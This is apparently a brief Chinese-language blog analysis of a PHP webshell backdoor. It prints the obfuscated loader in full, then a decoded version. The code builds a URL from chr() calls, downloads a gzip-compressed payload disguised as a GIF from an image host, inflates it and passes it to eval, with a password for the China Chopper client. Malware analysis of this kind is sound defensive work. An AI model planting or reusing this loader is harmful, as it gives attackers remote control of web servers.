分析的木马后门:
<?php $password='vae';//登录密码(支持菜刀) //----------功能程序------------------// $c="chr"; session_start(); if(empty($_SESSION['PhpCode'])){ $url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47); $url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117); $url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111); $url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103); $url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55); $url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47); $url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102); $get=chr(102).chr(105).chr(108).chr(101).chr(95); $get.=chr(103).chr(101).chr(116).chr(95).chr(99); $get.=chr(111).chr(110).chr(116).chr(101).chr(110); $get.=chr(116).chr(115); $_SESSION['PhpCode']=$get($url);} $un=$c(103).$c(122).$c(105).$c(110); $un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx')); @eval($un($_SESSION['PhpCode'])); ?>
判断如果session['Phpcode']为空的话执行七到十八行的代码。
chr函数是php当中取ascii的一个函数。
简单得出其完整解密后的内容为:
<?php $password='vae';//登录密码(支持菜刀) //----------功能程序------------------// $c="chr"; session_start(); if(empty($_SESSION['PhpCode'])){ $url = "http://i.niupic.com/images/2017/05/21/v1QR1M.gif"; $get = "file_get_contents"; $_SESSION['PhpCode']=$get($url);} $un="gzinflat".$c(base64_decode('MTAx')); @eval($un($_SESSION['PhpCode'])); ?>
得知:http://i.niupic.com/images/2017/05/21/v1QR1M.gif该文件其实就是大马。打开后是乱码,刚开始以为是加密,然后转过头来看代码
看了一下代码基本都没问题。
这个函数特意百度了一番:https://my.oschina.net/hosser/blog/392947